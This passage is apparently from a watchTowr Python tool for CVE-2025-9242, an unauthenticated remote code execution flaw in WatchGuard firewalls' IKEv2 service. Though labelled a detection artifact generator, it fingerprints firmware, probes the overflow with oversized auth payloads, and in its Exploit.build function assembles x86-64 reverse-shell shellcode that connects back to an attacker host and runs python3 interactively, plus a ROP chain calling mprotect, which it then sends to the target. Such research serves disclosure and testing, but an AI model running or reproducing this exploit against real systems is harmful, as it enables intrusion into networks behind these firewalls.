            IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('4048b7d56ebce88525e7de7f00d6c2d3c0000000')) +
            IkePacker.vendor_id(PayloadType.NOTIFY, bytes.fromhex('4048b7d56ebce88525e7de7f00d6c2d3')) +
            IkePacker.notify(PayloadType.NOTIFY, NotifyType.IKEV2_FRAGMENTATION_SUPPORTED, protocol_id = 0) +
            IkePacker.notify(PayloadType.NOTIFY, NotifyType.REDIRECT_SUPPORTED, protocol_id = 0) +
            IkePacker.notify(PayloadType.NONE, NotifyType.SIGNATURE_HASH_ALGORITHMS, bytes.fromhex('0001000200030004'), protocol_id = 0)
        ))
        responder_spi = r.responder_spi

        # Check for Watchguard firmware version
        if FW_VERSION == None:
            vendors = r.get(PayloadType.VENDOR_ID)
            for vendor in vendors:
                # WatchGuard vendor id
                if len(vendor) > 32 and vendor[:8].hex() == 'bfc22e9856ba9936':
                    try:
                        watchguard_data = base64.b64decode(vendor[32:].decode('ascii')).decode()
                        logging.debug(f'[#] WatchGuard vendor data: {watchguard_data}')

                        # VN=12.11.3 BN=719894
                        # VN=12.11.4 BN=722644
                        match = re.search(r"VN=([0-9\.]+) BN=([0-9]+)", watchguard_data)
                        if match:
                            FW_VERSION = match.group(1)
                            BUILD_NUMBER = match.group(2)
                            logging.info(f'[#] WatchGuard Firmware Version: {FW_VERSION}')
                            logging.info(f'[#] WatchGuard Build Number: {BUILD_NUMBER}')

                            if WatchGuardFw.version_tuple(FW_VERSION) < WatchGuardFw.version_tuple("12.11.4"):
                                logging.info(f"[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number {FW_VERSION} < 12.11.4")
                            else:
                                logging.info(f"[-] IKEv2 service is patched against CVE-2025-9242 based on version number {FW_VERSION} >= 12.11.4")

                    except UnicodeDecodeError:
                        logging.debug(f'[#] Unicode decode error while decoding {watchguard_data}')
                        continue
                    except binascii.Error:
                        logging.debug(f'[#] Base64 decode error while decoding {vendor[32:].decode('ascii')}')
                        continue

        # Check for errors
        notifications = r.get(PayloadType.NOTIFY)
        for notification in notifications:
            if notification.message_type == NotifyType.NO_PROPOSAL_CHOSEN:
                raise IkeNoProposalChosenException()
            if notification.message_type == NotifyType.INVALID_KE_PAYLOAD:
                raise IkeInvalidKEPayloadException()

        # Only get crypto when using default transforms
        if default_transforms is None:
            # Get responder nonce and server public key from response
            responder_nonce = r.get(PayloadType.NONCE)
            server_public_key_bytes = r.get(PayloadType.KEY_EXCHANGE)
            if len(responder_nonce) != 1:
                raise IkeMissingNonceException()
            if len(server_public_key_bytes) != 1:
                raise IkeMissingKeyExchangeException()

            # Perform key exchange
            self.crypto.key_exchange(responder_spi, responder_nonce[0], server_public_key_bytes[0][4:]) # Skip 4-byte header

            # Print keys for Wireshark
            logger.debug(f'\n=== Wireshark ikev2_decryption_table ===')
            logger.debug(f'* Initiator\'s SPI: {self.crypto.initiator_spi:016x}')
            logger.debug(f'* Responder\'s SPI: {self.crypto.responder_spi:016x}')
            logger.debug(f'* SK_ei: {self.crypto.SK_ei.hex()}')
            logger.debug(f'* SK_er: {self.crypto.SK_er.hex()}')
            logger.debug(f'* Encryption algorithm: "AES-CBC-256 [RFC3602]"')
            logger.debug(f'* SK_ai: {self.crypto.SK_ai.hex()}')
            logger.debug(f'* SK_ar: {self.crypto.SK_ar.hex()}')
            logger.debug(f'* Integrity algorithm: "HMAC_SHA2_256_128 [RFC4868]"')
            logger.debug(f'========================\n')

        return r

    def auth(self, identification_initiator=b'WatchGuard'):
        return self.send_encrypted(ExchangeType.IKE_AUTH, 1, (
            IkePacker.identification_initiator(PayloadType.CERTIFICATE, 2, identification_initiator) +
            IkePacker.certificate(PayloadType.NOTIFY, 4, bytes.fromhex('308202d330820279a003020102020401000013300a06082a8648ce3d040302304b310b3009060355040613024445310f300d0603550408130642617965726e310c300a060355040a13034e4350311d301b060355040313144e43502044656d6f2043412045434320323035303022180f32303136303830343038303031335a180f32303530303830353038303031335a3074310b3009060355040613024445311a3018060355040a0c1144656d6f204f7267616e697a6174696f6e3110300e060355040b0c0744656d6f204f553110300e06035504030c07436c69656e74313125302306092a864886f70d0109011616636c69656e74314064656d6f2e6e63702d652e636f6d3059301306072a8648ce3d020106082a8648ce3d03010703420004b74572a1b5dd1c4cafdab7f06a92913cab7ee2a55106efa4056e2dc17369600510553454e37e69e9a08c5abae5a05a77e01ebb04e4b272fe349f12a34088ceeaa382011c3082011830090603551d1304023000300b0603551d0f0404030205a0301d0603551d250416301406082b0601050507030206082b06010505070307301d0603551d0e041604145a5e6aa29f89959131c17018ef64dc2a8a4a4a6a30750603551d23046e306c801425db6d44dec7a03eb5f8623ab18784546a0f0409a14fa44d304b310b3009060355040613024445310f300d0603550408130642617965726e310c300a060355040a13034e4350311d301b060355040313144e43502044656d6f204341204543432032303530820302000230490603551d1104423040a026060a2b060104018237140203a0180c16436c69656e74314064656d6f2e6e63702d652e636f6d8116436c69656e74314064656d6f2e6e63702d652e636f6d300a06082a8648ce3d04030203480030450220602d766db7e07b70d88e3810acc6cd350ccdda1e60d77bd36ed6e60f869ef371022100d1e3d278fcacf41cd8380691363ad3933d6bc293fae9c847ddf6187bb0f06f49')) +
            IkePacker.notify(PayloadType.NOTIFY, NotifyType.INITIAL_CONTACT) +
            IkePacker.notify(PayloadType.CERTIFICATE_REQUEST, NotifyType.HTTP_CERT_LOOKUP_SUPPORTED) +
            IkePacker.certificate_request(PayloadType.CONFIGURATION, 4, []) +
            IkePacker.configuration(PayloadType.SECURITY_ASSOCIATION, 1, [
                IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_ADDRESS),
                IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_NETMASK),
                IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_DNS),
                IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_MBNS),
                IkePacker.configuration_attribute(20002),
                IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP6_ADDRESS),
                IkePacker.configuration_attribute(9),
                IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP6_DNS ),
                IkePacker.configuration_attribute(25),
                IkePacker.configuration_attribute(ConfigurationAttribute.APPLICATION_VERSION),
                IkePacker.configuration_attribute(28672),
                IkePacker.configuration_attribute(28673),
                IkePacker.configuration_attribute(28674),
                IkePacker.configuration_attribute(20006),
                IkePacker.configuration_attribute(20007),
                IkePacker.configuration_attribute(28675),
                IkePacker.configuration_attribute(28676),
                IkePacker.configuration_attribute(28677),
                IkePacker.configuration_attribute(28678),
                IkePacker.configuration_attribute(28679),
                IkePacker.configuration_attribute(28680),
                IkePacker.configuration_attribute(28681),
                IkePacker.configuration_attribute(20003),
                IkePacker.configuration_attribute(20004),
                IkePacker.configuration_attribute(28682),
                IkePacker.configuration_attribute(20005, b'debian'),
                IkePacker.configuration_attribute(28682, b'debian'),
            ]) +
            IkePacker.security_association(PayloadType.TRAFFIC_SELECTOR_INITIATOR, IkePacker.proposal(PayloadType.NONE, 1, 3, [
                IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, EncryptionAlgorithm.ENCR_AES_CBC.value, 0x800e0100),
                IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, PseudoRandomFunction.PRF_HMAC_SHA2_256.value),
                IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, IntegrityAlgorithm.AUTH_HMAC_SHA2_256_128.value),
                IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value),
            ], spi=b'\xc1\xa9\x65\x6b')) +
            IkePacker.traffic_selector(PayloadType.TRAFFIC_SELECTOR_RESPONDER, [
                IkePacker.traffic_selector_ipv4_address_range(0, 65535, '0.0.0.0', '255.255.255.255'),
            ]) +
            IkePacker.traffic_selector(PayloadType.VENDOR_ID, [
                IkePacker.traffic_selector_ipv4_address_range(0, 65535, '0.0.0.0', '255.255.225.255'),
            ]) +
            IkePacker.vendor_id(PayloadType.NOTIFY, bytes.fromhex('afcad71368a1f1c96b8696fc77570100')) +
            IkePacker.notify(PayloadType.NOTIFY, NotifyType.MOBIKE_SUPPORTED, protocol_id = 0) +
            IkePacker.notify(PayloadType.NONE, NotifyType.MULTIPLE_AUTH_SUPPORTED, protocol_id = 0)
        ))

class IkeTransformGroup:
    def __init__(self):
        self.encryption_algorithm = None
        self.pseudo_random_function = None
        self.integrity_algorithm = None
        self.diffie_hellman_group = None

class RunnerStatus(enum.IntEnum):
    SUCCESS = 0
    TIMEOUT = 1
    NO_PROPOSAL_CHOSEN = 2
    SA_INIT_FAILED = 3

class Runner:
    @staticmethod
    def check_default_transform(ike):
        logging.info(f'[#] Sending IKEv2 SA Init with default transform')
        ike.reset()
        try:
            ike.sa_init()
        except TimeoutError:
            logging.debug(f'[#] Timeout')
            return RunnerStatus.TIMEOUT
        except IkeNoProposalChosenException:
            logging.debug(f'[#] No proposal chosen')
            return RunnerStatus.NO_PROPOSAL_CHOSEN
        finally:
            ike.close()
        return RunnerStatus.SUCCESS

    @staticmethod
    def enumerate_transforms(ike):
        # See: https://www.iana.org/assignments/ikev2-parameters/ikev2-parameters.xhtml
        encryptions = {
            'ENCR_DES_IV64': {'id': 1},
            'ENCR_DES': {'id': 2},
            'ENCR_3DES': {'id': 3},
            'ENCR_RC5': {'id': 4},
            'ENCR_IDEA': {'id': 5},
            'ENCR_CAST': {'id': 6},
            'ENCR_BLOWFISH': {'id': 7},
            'ENCR_3IDEA': {'id': 8},
            'ENCR_DES_IV32': {'id': 9},
            'RESERVED': {'id': 10},
            'ENCR_NULL': {'id': 11},
            'ENCR_AES_CBC': {
                'id': 12,
                'attributes': [
                    0x800e0080, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 128 (0x0080)
                    0x800e00c0, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 192 (0x00c0)
                    0x800e0100, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 256 (0x0100)
                ],
            },
            'ENCR_AES_CTR': {'id': 13},
            'ENCR_AES_CCM_8': {'id': 14},
            'ENCR_AES_CCM_12': {'id': 15},
            'ENCR_AES_CCM_16': {'id': 16},
            'ENCR_AES_GCM_8': {'id': 18},
            'ENCR_AES_GCM_12': {'id': 19},
            'ENCR_AES_GCM_16': {'id': 20},
            'ENCR_NULL_AUTH_AES_GMAC': {'id': 21},
            'P1619_XTS_AES': {'id': 22},
            'ENCR_CAMELLIA_CBC': {'id': 23},
            'ENCR_CAMELLIA_CTR': {'id': 24},
            'ENCR_CAMELLIA_CCM_8': {'id': 25},
            'ENCR_CAMELLIA_CCM_12': {'id': 26},
            'ENCR_CAMELLIA_CCM_16': {'id': 27},
            'ENCR_CHACHA20_POLY1305': {'id': 28},
            'ENCR_AES_CCM_8_IIV': {'id': 29},
            'ENCR_AES_GCM_16_IIV': {'id': 30},
            'ENCR_CHACHA20_POLY1305_IIV': {'id': 31},
            'ENCR_KUZNYECHIK_MGM_KTREE': {'id': 32},
            'ENCR_MAGMA_MGM_KTREE': {'id': 33},
            'ENCR_KUZNYECHIK_MGM_MAC_KTREE': {'id': 34},
            'ENCR_MAGMA_MGM_MAC_KTREE': {'id': 35},
        }
        pseudo_random_functions = {
            'PRF_HMAC_MD5': 1,
            'PRF_HMAC_SHA1': 2,
            'PRF_HMAC_TIGER': 3,
            'PRF_AES128_XCBC': 4,
            'PRF_HMAC_SHA2_256': 5,
            'PRF_HMAC_SHA2_384': 6,
            'PRF_HMAC_SHA2_512': 7,
            'PRF_AES128_CMAC': 8,
            'PRF_HMAC_STREEBOG_512': 9,
        }
        integrity_algorithms = {
            'AUTH_HMAC_MD5_96': 1,
            'AUTH_HMAC_SHA1_96': 2,
            'AUTH_DES_MAC': 3,
            'AUTH_KPDK_MD5': 4,
            'AUTH_AES_XCBC_96': 5,
            'AUTH_HMAC_MD5_128': 6,
            'AUTH_HMAC_SHA1_160': 7,
            'AUTH_AES_CMAC_96': 8,
            'AUTH_AES_128_GMAC': 9,
            'AUTH_AES_192_GMAC': 10,
            'AUTH_AES_256_GMAC': 11,
            'AUTH_HMAC_SHA2_256_128': 12,
            'AUTH_HMAC_SHA2_384_192': 13,
            'AUTH_HMAC_SHA2_512_256': 14,
        }
        key_exchange_methods = {
            'DH_GROUP_2048_BIT_MODP': 14,
            'DH_GROUP_768_BIT_MODP': 1,
            'DH_GROUP_1024_BIT_MODP': 2,
            'DH_GROUP_1536_BIT_MODP': 5,
            'DH_GROUP_3072_BIT_MODP': 15,
            'DH_GROUP_4096_BIT_MODP': 16,
            'DH_GROUP_6144_BIT_MODP': 17,
            'DH_GROUP_8192_BIT_MODP': 18,
            'RANDOM_ECP_GROUP_256_BIT': 19,
            'RANDOM_ECP_GROUP_384_BIT': 20,
            'RANDOM_ECP_GROUP_521_BIT': 21,
            'DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP': 22,
            'DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP': 23,
            'DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP': 24,
            'RANDOM_ECP_GROUP_192_BIT': 25,
            'RANDOM_ECP_GROUP_224_BIT': 26,
            'BRAINPOOLP224R1': 27,
            'BRAINPOOLP256R1': 28,
            'BRAINPOOLP384R1': 29,
            'BRAINPOOLP512R1': 30,
            'CURVE25519': 31,
            'CURVE448': 32,
            'GOST3410_2012_256': 33,
            'GOST3410_2012_512': 34,
            'ML_KEM_512': 35,
            'ML_KEM_768': 36,
            'ML_KEM_1024': 37,
        }

        transforms = []

        # Append encryptions
        for enc in encryptions:
            if 'attributes' in encryptions[enc] and encryptions[enc]['attributes'] is not None:
                for attr in encryptions[enc]['attributes']:
                    transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, encryptions[enc]['id'], attr))
            else:
                transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, encryptions[enc]['id'], None))

        # Append pseudo-random functions
        for psr in pseudo_random_functions:
            transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, pseudo_random_functions[psr]))

        # Append integrity algorithms
        for integ in integrity_algorithms:
            transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, integrity_algorithms[integ]))

        # Loop each key exchange methods
        supported_transforms = []
        service_found = False
        for kem in key_exchange_methods:
            # Retry on timeouts up to 2 times
            for i in range(2):
                ike.reset()
                try:
                    logging.debug(f'[#] Sending IKEv2 SA Init with Diffie Hellman Group: {DiffieHellmanGroup(key_exchange_methods[kem]).name} ({key_exchange_methods[kem]})')
                    r = ike.sa_init(transforms + [IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, key_exchange_methods[kem])])
                    sa = r.get(PayloadType.SECURITY_ASSOCIATION)
                    if len(sa) != 1:
                        service_found = True
                        break

                    # Append supported transform to list
                    service_found = True
                    supported_transform = IkeTransformGroup()
                    for transform in sa[0].proposal.transforms:
                        logging.debug(f'[#] Found supported transform: {str(transform)}')
                        if transform.transform_type == TransformType.ENCRYPTION_ALGORITHM:
                            supported_transform.encryption_algorithm = transform
                        elif transform.transform_type == TransformType.PSEUDO_RANDOM_FUNCTION:
                            supported_transform.pseudo_random_function = transform
                        elif transform.transform_type == TransformType.INTEGRITY_ALGORITHM:
                            supported_transform.integrity_algorithm = transform
                        elif transform.transform_type == TransformType.DIFFIE_HELLMAN_GROUP:
                            supported_transform.diffie_hellman_group = transform

                    supported_transforms.append(supported_transform)
                    break
                except IkeNoProposalChosenException:
                    logging.debug(f'[#] No proposal chosen')
                    service_found = True
                    break
                except IkeInvalidKEPayloadException:
                    logging.debug(f'[#] Invalid KE payload')
                    service_found = True

                    # Invalid KE payload occurs when the diffie hellman group is supported but the key exchange payload sent is invalid
                    supported_transform = IkeTransformGroup()
                    supported_transform.diffie_hellman_group = IkeTransform(TransformType.DIFFIE_HELLMAN_GROUP, 0, key_exchange_methods[kem], None)
                    supported_transforms.append(supported_transform)
                    break
                except TimeoutError:
                    logging.debug(f'[#] Timeout')
                    continue
                finally:
                    ike.close()

        return service_found, supported_transforms

    @staticmethod
    def trigger(ike, payload):
        # Send SA Init up to 5 times
        success = False
        for i in range(5):
            ike.reset()
            try:
                logging.debug(f'[#] Trigger verification length ({len(payload)}) -> Sending SA Init')
                ike.sa_init()
            except TimeoutError:
                # Unexpected timeout, try again
                logging.debug(f'[#] Trigger verification length ({len(payload)}) -> Sending SA Init -> Timeout')
                ike.close()
                continue

            # SA Init succeeded as expected, send auth packet
            success = True
            break

        # SA Init failed multiple times
        if not success:
            logging.error('[-] SA Init failed multiple times, has the service crashed?')
            return RunnerStatus.SA_INIT_FAILED

        try:
            logging.debug(f'[#] Sending IKE_AUTH payload')
            ike.auth(payload)
        except TimeoutError:
            logging.debug(f'[#] Sending IKE_AUTH payload -> Timeout')
            return RunnerStatus.TIMEOUT
        finally:
            ike.close()

            logging.debug(f'[#] Sending IKE_AUTH payload -> Received response')
        return RunnerStatus.SUCCESS

class Exploit:
    @staticmethod
    def build(version, ip, port):
        wg = WatchGuardFw(version)

        logging.info(f'[#] Building shellcode payload...')

        # sockaddr_in (sin_family: AF_INET [0x2], sin_port, sin_addr, sin_zero [0x0])
        data = struct.pack('<H', 0x02) + struct.pack('!H', port) + socket.inet_aton(ip) + (b'\x00' * 8) # 0x00 - serv_addr
        data += b"/usr/bin/python3"                 # 0x10
        data += b"\x00\x00\x00\x00\x00\x00\x00\x00" # 0x20
        data += b"-i\x00\x00-u\x00\x00"             # 0x28 (-i), 0x2c (-u)
        data += b"\x00" * (wg.get_i('offset_shellcode') - len(data))

        shellcode = b""

        # r13 = &shellcode - 0x10 (data)
        shellcode += b"\xe8\x00\x00\x00\x00\x41\x5d"  # call 0; pop r13
        shellcode += b"\x49\x83\xed" + struct.pack('<B', wg.get_i('offset_shellcode') + 5) # sub r13, offset_shellcode+5 (5 for call instruction)

        # int sockfd = socket[41](AF_INET [0x2], SOCK_STREAM [0x1], IPPROTO_TCP [0x6]);
        shellcode += b"\x6a\x02\x5f" # push 0x2; pop rdi
        shellcode += b"\x6a\x01\x5e" # push 0x1; pop rsi
        shellcode += b"\x6a\x06\x5a" # push 0x6; pop rdx
        shellcode += b"\x6a\x29\x58" # push 41;  pop rax
        shellcode += b"\x0f\x05"     # syscall(41)

        # connect[42](sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
        shellcode += b"\x49\x89\xc6" # mov r14, rax
        shellcode += b"\x4c\x89\xf7" # mov rdi, r14
        shellcode += b"\x4c\x89\xee" # mov rsi, r13
        shellcode += b"\x6a\x10\x5a" # push 0x10; pop rdx
        shellcode += b"\x6a\x2a\x58" # push 42; pop rax
        shellcode += b"\x0f\x05"     # syscall(42)

        # dup2[33](sockfd, 0);
        shellcode += b"\x4c\x89\xf7" # mov rdi, r14
        shellcode += b"\x6a\x00\x5e" # push 0x0; pop rsi
        shellcode += b"\x6a\x21\x58" # push 33; pop rax
        shellcode += b"\x0f\x05"     # syscall(33)

        # dup2[33](sockfd, 1);
        shellcode += b"\x4c\x89\xf7" # mov rdi, r14
        shellcode += b"\x6a\x01\x5e" # push 0x1; pop rsi
        shellcode += b"\x6a\x21\x58" # push 33; pop rax
        shellcode += b"\x0f\x05"     # syscall(33)

        # dup2[33](sockfd, 2);
        shellcode += b"\x4c\x89\xf7" # mov rdi, r14
        shellcode += b"\x6a\x02\x5e" # push 0x2; pop rsi
        shellcode += b"\x6a\x21\x58" # push 33; pop rax
        shellcode += b"\x0f\x05"     # syscall(33)

        # char *argv[] = { "/usr/bin/python3", "-i", "-u", NULL };
        # execve[59]("/usr/bin/python3", argv, NULL);
        shellcode += b"\x4c\x89\xef"     # mov rdi, r13
        shellcode += b"\x48\x83\xc7\x10" # add rdi, 0x10 (rdi = "/usr/bin/python3\x00")
        shellcode += b"\x48\x89\xe6"     # mov rsi, rsp  (rsi = argv)
        shellcode += b"\x48\x83\xee\x20" # sub rsi, 0x20 (0x20 for 4 argv pointers)
        shellcode += b"\x4c\x89\xe8"     # mov rax, r13
        shellcode += b"\x48\x83\xc0\x20" # add rax, 0x20
        shellcode += b"\x50"             # push rax      (argv[3] = NULL)
        shellcode += b"\x48\x83\xc0\x08" # add rax, 0x8
        shellcode += b"\x50"             # push rax      (argv[2] = "-i\x00")
        shellcode += b"\x48\x83\xc0\x04" # add rax, 0x4
        shellcode += b"\x50"             # push rax      (argv[1] = "-u\x00")
        shellcode += b"\x48\x83\xe8\x1c" # sub rax, 0x1c
        shellcode += b"\x50"             # push rax      (argv[0] = "/usr/bin/python3\x00")
        shellcode += b"\x6a\x00\x5a"     # push 0x0; pop rdx
        shellcode += b"\x6a\x3b\x58"     # push 59; pop rax
        shellcode += b"\x0f\x05"         # syscall(59)

        # Validate data length does not exceed offset_shellcode
        if len(data) != wg.get_i('offset_shellcode'):
            logging.error(f'[-] Data length must be {wg.get_i("offset_shellcode")}')
            return None

        buffer = b''
        buffer += data
        buffer += shellcode
        buffer += b'C' * (520 - len(buffer))

        logging.info(f'[#] Building ROP chain...')

        rop_chain = (
            # rbp = rsp
            wg.get('pop_rcx_ret') +           # rcx = pop r13; ret
            wg.get('pop_r13_ret') +           # 
            wg.get('mov_rax_rcx_ret') +       # rax = rcx
            wg.get('mov_rbp_rsp_call_rax') +  # rbp = rsp; call rax (return address is in r13)

            # rax = rbp
            wg.get('mov_rax_rbp_pop_rbx_pop_rbp_ret') + # rax = rbp
            struct.pack('<Q', 0x0) +                    # rbx = 0
            struct.pack('<Q', 0x0) +                    # rbp = 0

            # rax -= (offset_stack_page_aligned)
            wg.get('pop_rcx_ret') +                     # rcx = (offset_stack_page_aligned)
            struct.pack('<Q', (wg.get_i('offset_stack_page_aligned'))) +
            wg.get('sub_rax_rcx_ret') +                 # rax -= rcx

            # rbx = rax
            wg.get('push_rax_mov_rax_rbx_pop_rbx_ret') + # 

            # rdi = rbx (stack buffer page aligned)
            wg.get('pop_rcx_ret') +           # rcx = pop r13; ret
            wg.get('pop_r13_ret') +           # 
            wg.get('mov_rax_rcx_ret') +       # rax = rcx
            wg.get('mov_rdi_rbx_call_rax') +  # rdi = rbx; call rax (return address is in r13)

            # rsi = 0x2000
            wg.get('pop_rsi_ret') +           # rsi = 0x2000; ret
            struct.pack('<Q', 0x2000) +

            # rdx = PROT_READ|PROT_WRITE|PROT_EXEC (0x7)
            wg.get('pop_rdx_ret') +           # rdx = 0x7; ret
            struct.pack('<Q', 0x7) +

            # rax = got_bind
            wg.get('pop_rcx_ret') +           # rcx = got_bind; ret
            wg.get('got_bind') +
            wg.get('mov_rax_rcx_ret') +       # rax = rcx

            # rax = bind
            wg.get('mov_rax_rax_ret') +       # rax = bind

            # rax -= offset_bind_mprotect
            wg.get('pop_rcx_ret') +           # rcx = offset_bind_mprotect
            wg.get('offset_bind_mprotect') +
            wg.get('sub_rax_rcx_ret') +       # rax -= rcx

            # mprotect(rdi: stack buffer page aligned, rsi: 0x2000, edx: PROT_READ|PROT_WRITE|PROT_EXEC)
            wg.get('jmp_rax') +

            # rbp = rsp
            wg.get('pop_rcx_ret') +           # rcx = pop r13; ret
            wg.get('pop_r13_ret') +           # 
            wg.get('mov_rax_rcx_ret') +       # rax = rcx
            wg.get('mov_rbp_rsp_call_rax') +  # rbp = rsp; call rax (return address is in r13)

            # rax = rbp
            wg.get('mov_rax_rbp_pop_rbx_pop_rbp_ret') + # rax = rbp
            struct.pack('<Q', 0x0) +                    # rbx = 0
            struct.pack('<Q', 0x0) +                    # rbp = 0

            # rax -= (offset_stack-offset_shellcode)
            wg.get('pop_rcx_ret') +                     # rcx = (offset_stack-offset_shellcode)
            struct.pack('<Q', (wg.get_i('offset_stack')-wg.get_i('offset_shellcode'))) +
            wg.get('sub_rax_rcx_ret') +                 # rax -= rcx

            # rbx = rax
            wg.get('push_rax_mov_rax_rbx_pop_rbx_ret') + # 

            # call shellcode
            wg.get('jmp_rbx')
        )

        return (
            buffer + # buffer
            b'B' * 8 + #
            b'C' * 8 + #
            b'D' * 8 + # RBX
            b'E' * 8 + # R12
            b'F' * 8 + # R13
            b'G' * 8 + # R14
            b'H' * 8 + # R15
            b'I' * 8 + # RBP
            rop_chain  # RIP
        )

def main(args):
    banner = """			 __         ___  ___________                   
	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
				  \\/          \\/     \\/                            

        watchTowr-vs-WatchGuard-CVE-2025-9242.py

        (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator
        
          - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-9242]

"""
    print(banner)

    # Setup logging
    logging.basicConfig(level=logging.DEBUG if args.verbose else logging.INFO, format='%(message)s')

    # Setup IKE client
    ike = Ike(args.rhost, args.rport, args.timeout)

    # Step 1: Check if IKEv2 transform ENCR_AES_CBC_256, PRF_HMAC_SHA2_256, AUTH_HMAC_SHA2_256_128, 2048 bit MODP group is supported
    default_status = Runner.check_default_transform(ike)
    if default_status != RunnerStatus.SUCCESS:
        # Skip enumerating transforms if requested
        if args.skip_enumerate:
            if default_status == RunnerStatus.NO_PROPOSAL_CHOSEN:
                logging.warning("[!] IKEv2 service found but default IKEv2 transform not supported")
                return
            logging.error("[-] No IKEv2 service found")
            return

        # Step 2: Enumerate IKEv2 Transforms
        logging.info('[#] Enumerating IKEv2 transforms...')
        service_found, supported_transforms = Runner.enumerate_transforms(ike)
        if not service_found:
            logging.error("[!] No IKEv2 service found")
            return

        if len(supported_transforms) == 0:
            logging.warning("[!] IKEv2 service found but no IKEv2 transforms supported")
            return

        # Print supported transforms
        logging.warning("[!] Default transform not supported")
        logging.info("[+] Supported IKEv2 transforms:\n")
        logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|')
        logging.info(f'|   Encryption Algorithm    |  Pseudo Random Function   |    Integrity Algorithm    |   Diffie Hellman Group    |')
        logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|')
        for transform in supported_transforms:
            logging.info(f'| {str(transform.encryption_algorithm).ljust(25)} | {str(transform.pseudo_random_function).ljust(25)} | {str(transform.integrity_algorithm).ljust(25)} | {str(transform.diffie_hellman_group).ljust(25)} |')
        logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|')
        return

    # Step 3: Trigger verification
    logging.info("[+] Default IKEv2 service found")
    if not args.soft_verify:
        logging.info(f'[#] Verifying if IKEv2 service is vulnerable...')

        # Send a valid auth packet to ensure the service is running as expected
        trigger_status = Runner.trigger(ike, b'A' * 512)
        if trigger_status == RunnerStatus.SA_INIT_FAILED:
            return
        elif trigger_status == RunnerStatus.TIMEOUT:
            logging.error("[-] IKEv2 timed out responding to valid auth packet, has the service crashed?")
            return

        # Send an invalid auth packet, if the service responds then it is vulnerable
        trigger_status = Runner.trigger(ike, b'A' * 513)
        if trigger_status == RunnerStatus.SA_INIT_FAILED:
            return
        elif trigger_status == RunnerStatus.TIMEOUT:
            logging.info("[-] IKEv2 service is patched against CVE-2025-9242")
        else:
            logging.info("[+] IKEv2 service is vulnerable to CVE-2025-9242")

        # Check the service is running as expected
        trigger_status = Runner.trigger(ike, b'A' * 512)
        if trigger_status == RunnerStatus.SA_INIT_FAILED:
            return
        elif trigger_status == RunnerStatus.TIMEOUT:
            logging.error("[-] IKEv2 timed out responding to valid auth packet, has the service crashed?")
            return

    # Step 4: Trigger exploit
    if not args.exploit:
        return
    if args.lhost is None:
        logging.error("[-] Local host parameter is required to exploit")
        return
    if FW_VERSION == None and args.fw_version is None:
        logging.error("[-] Failed to determine WatchGuard firmware version")
        return

    target_fw_version = args.fw_version
    if target_fw_version == None:
        target_fw_version = FW_VERSION

    if not WatchGuardFw.has(target_fw_version):
        logging.error(f"[-] Unsupported WatchGuard firmware version: {target_fw_version}")
        return

    payload = Exploit.build(target_fw_version, args.lhost, args.lport)
    logging.info(f'[#] Sending exploit payload to {args.lhost}:{args.lport}')
    Runner.trigger(ike, payload)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="WatchGuard CVE-2025-9242 Detection Artifact Generator")
    parser.add_argument("-rh", "--rhost", required=True, help="Remote host")
    parser.add_argument("-rp", "--rport", type=int, default=500, help="Remote port (default: 500)")
    parser.add_argument("-t", "--timeout", type=int, default=10, help="Timeout in seconds (default: 10)")
    parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
    parser.add_argument("-sv", "--soft-verify", action="store_true", help="Only verify based on version without verifying with auth packet")
    parser.add_argument("-se", "--skip-enumerate", action="store_true", help="Skip enumerating transforms")
    parser.add_argument("-e", "--exploit", action="store_true", help="Exploit the vulnerability")
    parser.add_argument("-lh", "--lhost", help="Local host")
    parser.add_argument("-lp", "--lport", type=int, default=31337, help="Local port (default: 31337)")
    parser.add_argument("-fw", "--fw-version", help="WatchGuard firmware version (eg: 12.11.3)")

    main(parser.parse_args())